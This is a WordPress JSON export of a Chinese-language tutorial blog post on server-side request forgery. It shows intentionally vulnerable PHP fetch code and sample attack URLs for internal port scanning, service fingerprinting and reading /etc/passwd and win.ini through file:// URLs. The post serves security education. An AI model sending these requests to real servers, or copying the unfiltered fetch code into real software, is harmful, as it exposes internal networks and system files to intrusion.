{"id":235,"date":"2020-08-10T15:39:42","date_gmt":"2020-08-10T07:39:42","guid":{"rendered":"http:\/\/note.systw.net\/note\/?p=235"},"modified":"2024-02-17T20:20:56","modified_gmt":"2024-02-17T12:20:56","slug":"ssrf","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/235","title":{"rendered":"SSRF"},"content":{"rendered":"\n

SSRF(Server-Side Request Forgery:\u670d\u52d9\u7aef\u8acb\u6c42\u507d\u9020)<\/h3>\n

\u7531\u653b\u64ca\u8005\u900f\u904e\u670d\u52d9\u7aef\u767c\u51fa\u8acb\u6c42\u7684\u4e00\u7a2e\u5b89\u5168\u5f31\u9ede\uff0c\u901a\u5e38SSRF\u7684\u653b\u64ca\u76ee\u6a19\u662f\u5916\u7db2\u7121\u6cd5\u5b58\u53d6\u7684\u5167\u7db2\u7cfb\u7d71\uff0c\u56e0\u70ba\u653b\u64ca\u662f\u7531\u670d\u52d9\u7aef\u767c\u8d77\u7684\uff0c\u6240\u4ee5\u53ef\u4ee5\u9023\u5230\u5916\u7db2\u7121\u6cd5\u63a5\u89f8\u7684\u5167\u7db2\u7cfb\u7d71\u3002
\n\u9019\u985e\u6709\u5f31\u9ede\u7684\u7db2\u7ad9\u670d\u52d9\u4e3b\u8981\u63d0\u4f9b\u8207\u5176\u4ed6\u4e3b\u6a5f\u4e92\u52d5\u7684\u529f\u80fd\uff0c\u8b93\u4f7f\u7528\u8005\u6307\u5b9aurl\u5f97\u5230\u5716\u7247\u6216\u4e0b\u8f09\u8b80\u53d6\u6587\u4ef6\u7b49\u3002<\/p>\n

\u00a0<\/p>\n

\u5bb9\u6613\u51fa\u73feSSRF\u7684\u670d\u52d9<\/h3>\n

\u6703\u5c0d\u7528\u6236\u6307\u5b9a\u7684URL\u4e2d\u7684\u5716\u7247\u6587\u4ef6html\u7b49\u505a\u8655\u7406\uff0c\u4e26\u63d0\u4f9b\u76f8\u95dc\u61c9\u7528\u7684\u670d\u52d9
\n\u5982\u679c\u9019\u4e9b\u670d\u52d9\u6c92\u6709\u5c0dURL\u505a\u904e\u6ffe\u6216\u969f\u5236\uff0c\u5c31\u6703\u5b58\u5728SSRF\u5f31\u9ede
\nex:
\n\u7db2\u9801\u5206\u4eab\uff1a\u900f\u904eURL\u5206\u4eab\u7db2\u9801\u5167\u5bb9
\n\u8f49\u78bc\u670d\u52d9\uff1a\u900f\u904eURL\u628a\u539f\u4f4d\u7f6e\u7684\u7db2\u9801\u5167\u5bb9\u512a\u5316\u8abf\u6574\u6210\u9069\u5408\u624b\u6a5f\u89c0\u770b
\n\u7dda\u4e0a\u7ffb\u8b6f\uff1a\u7ffb\u8b6fURL\u6307\u5b9a\u7684\u4f4d\u7f6e
\n\u5716\u7247\u4e0b\u8f09\uff1a\u900f\u904eURL\u4f4d\u7f6e\u4e0b\u8f09\u5716\u7247
\n\u5716\u7247\u6587\u7ae0\u6536\u85cf\u529f\u80fd\uff1a\u900f\u904eURL\u5206\u4eab\u6536\u85cf\u56fe\u7247\u548c\u6587\u7ae0
\n\u5176\u4ed6\u6703\u547c\u53ebURL\u7684\u529f\u80fd<\/p>\n

\u00a0<\/p>\n

\n

\u5229\u7528SSRF\u653b\u64ca\u7bc4\u4f8b<\/h3>\n

\u5047\u8a2d\u6b63\u5e38\u529f\u80fd\u5982\u4e0b
\nhttp:\/\/testweb\/test.php \u53d6\u5f97\u7528\u6236\u63d0\u4f9b\u7684URL\uff0c\u4e26\u628aURL\u7684\u5167\u5bb9\u986f\u793a\u5230\u7db2\u9801\u4e0a\uff0c
\n\u539f\u78bc\u5982\u4e0b<\/p>\n

if (isset($_GET['url']))\n{\n  $link = $_GET['url'];\n  $curlobj = curl_init();\n  curl_setopt($curlobj, CURLOPT_POST, 0);\n  curl_setopt($curlobj,CURLOPT_URL,$link);\n  curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);\n  $result=curl_exec($curlobj);\n  curl_close($curlobj);\n  $filename = '\/curled\/'.rand().'.txt';\n  file_put_contents($filename, $result);\n  echo $result;\n}\n?>\n<\/code><\/pre>\n
\u6b63\u5e38\u4f7f\u7528\u65b9\u6cd5
\nhttp:\/\/testweb\/test.php?url=www.google.com
\n\u7528\u6236\u5728URL\u8f38\u5165www.google.com,\u7528\u6236\u9801\u9762\u6703\u8f38\u51fagoogle\u7684\u756b\u9762<\/p>\n
\u653b\u64ca\u65b9\u6cd51\uff0c\u6383\u63cf\u5167\u7db2\u57e0<\/h4>\n
http:\/\/testweb\/test.php?url=http:\/\/landb:22
\nhttp:\/\/testweb\/test.php?url=http:\/\/landb:25
\nhttp:\/\/testweb\/test.php?url=http:\/\/landb:3306
\n\u6839\u64da\u56de\u61c9\u7684banner\u8a0a\u606f\uff0c\u932f\u8aa4\u8cc7\u8a0a\uff0c\u56de\u61c9\u6642\u9593\uff0c\u5c01\u5305\u5927\u5c0f\u5224\u65b7\u8a72\u57e0\u662f\u5426\u6709\u958b\u653e<\/p>\n
\u653b\u64ca\u65b9\u6cd52\uff0c\u5c0d\u5167\u7db2WEB\u61c9\u7528\u505afingerprint<\/h4>\n
\u5224\u65b7\u662f\u5426\u6709phpMyAdmin
\nhttp:\/\/testweb\/test.php?url=http:\/\/lanserver\/phpMyAdmin\/themes\/original\/img\/b_tblimport.png
\n\u5224\u65b7\u662f\u5426\u70baDlink\u8a2d\u5099
\nhttp:\/\/testweb\/test.php?url=http:\/\/lanserver\/portName.js
\n\u5224\u65b7\u662f\u5426\u70baTomcat
\nhttp:\/\/testweb\/test.php?url=http:\/\/lanserver:8080\/manager\/images\/tomcat.gif<\/p>\n
\u653b\u64ca\u65b9\u6cd53\uff0c\u8b80\u53d6\u672c\u5730\u6a94\u6848<\/h4>\n
\u5c07URL\u63db\u6210file:\/\/\u7684\u5f62\u5f0f\u8b80\u53d6\u672c\u5730\u6a94\u6848
\n\u8b80\u53d6win.ini
\nhttp:\/\/testweb\/test.php?url=file:\/\/\/C:\/Windows\/win.ini<\/code>
\n\u8b80\u53d6passwd
\nhttp:\/\/testweb\/test.php?url=file:\/\/\/etc\/passwd<\/code><\/p>\n
\u00a0<\/p>\n
\n
\u5176\u4ed6\u53ef\u80fd\u51fa\u554f\u984c\u7684\u4ee3\u78bc\u7bc4\u4f8b<\/h3>\n
\u4f7f\u7528file_get_contents\u51fd\u6578\uff0c\u5f9e\u7528\u6236\u6307\u5b9a\u7684URL\u53d6\u5f97\u4e26\u4fdd\u7559\u5716\u7247\uff0c\u7136\u5f8c\u986f\u793a\u7d66\u7528\u6236<\/p>\n
if (isset($_POST['url']))\n{\n  $content = file_get_contents($_POST['url']);\n  $filename ='\/images\/'.rand().'.jpg';\n  file_put_contents($filename, $content);\n  echo $_POST['url'];\n  $img = '< img src=".$filename."\/>';\n}\necho $img;\n?>\n<\/code><\/pre>\n
\u4f7f\u7528fsockopen\u51fd\u6578\u53d6\u5f97\u7528\u6236\u6307\u5b9a\u7684URL\u5167\u5bb9\uff0c\u4e26\u5c07\u5f97\u5230\u7684\u6578\u64da\u986f\u793a\u51fa\u4f86<\/p>\n
$fp = fsockopen($host, intval($port), $errno, $errstr, 30);\nif (!$fp) {\n  echo "$errstr (error number $errno) n";\n} else {\n  $out = "GET $link HTTP\/1.1rn";\n  $out .= "Host: $hostrn";\n  $out .= "Connection: Closernrn";\n  $out .= "rn";\n  fwrite($fp, $out);\n  $contents='';\n  while (!feof($fp))$contents.= fgets($fp, 1024);\n  fclose($fp);\n  echo $contents;\n}\n?>\n<\/code><\/pre>\n
\u00a0<\/p>\n
refer
\nhttps:\/\/wizardforcel.gitbooks.io\/mst-sec-lecture-notes\/content\/%E6%BC%8F%E6%B4%9E%E7%AF%87%20SSRF.html
\nhttps:\/\/www.freebuf.com\/articles\/web\/20407.html
\nhttps:\/\/blog.csdn.net\/lionzl\/article\/details\/100570193?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.channel_param&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.channel_param<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[38],"tags":[],"class_list":["post-235","post","type-post","status-publish","format-standard","hentry","category-serverside"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/235","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=235"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/235\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=235"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=235"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=235"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}